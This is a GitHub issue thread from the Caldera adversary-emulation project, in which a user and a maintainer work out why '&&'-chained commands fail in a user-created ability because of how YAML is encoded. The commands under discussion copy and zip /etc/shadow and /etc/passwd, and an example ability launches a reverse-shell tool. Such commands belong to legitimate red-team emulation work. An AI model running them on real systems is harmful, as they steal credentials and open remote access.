### ISSUE TITLE
Command Concatenation

### ISSUE THREAD

**Issue by perra22** [mitre/caldera#1043]
Hi,
when I execute an ability that contains commands concatenated with "&&" the ability fails and return this error:

> syntax error near unexpected token `;&'

If I run the same commands concatenated with semicolon it works. Thanks.

**Comment by privateducky** [comment]
what OS are you testing against? can you give an example command? I don't think we've seen this yet but we can try and reproduce.

**Comment by perra22** [comment]
I'm testing against centos-release-7-7.1908.
This is the command:
`cd /tmp && sudo rm -r -f shadow shadow.zip &&
mkdir shadow && sudo cp /etc/shadow /tmp/shadow ;
sudo cp /etc/passwd /tmp/shadow ; sudo zip -FSr -r shadow.zip shadow`

**Comment by privateducky** [comment]
my hunch is that this command (in your ability file) is not using the | character.

in YML, the command field needs to have this character to ensure the command is "raw" and doesn't get encoded oddly. note this example:

```
...
  platforms:
    darwin:
      sh:
        command: |
          nohup ./reverse.go -tcp #{tcp_socket} -http #{server} && sleep 3 >/dev/null 2>&1 &
        payload: reverse.go
...
```

Can you confirm your ability file/command is using the | character?

**Comment by perra22** [comment]
The command doesn't start with "|", so this is the problem. I've created it inside the ability tab of Caldera... it shouldn't add the "|" character automatically? Thanks for the help.

**Comment by privateducky** [comment]
ah yeah- that's likely it. that sounds like a bug in the way we're creating the YML files, so I'll ensure we get that solved. 

for most abilities, this won't cause an issue. but for those which use "special characters" it runs the risk of not working.

**Comment by perra22** [comment]
Ok, thanks!
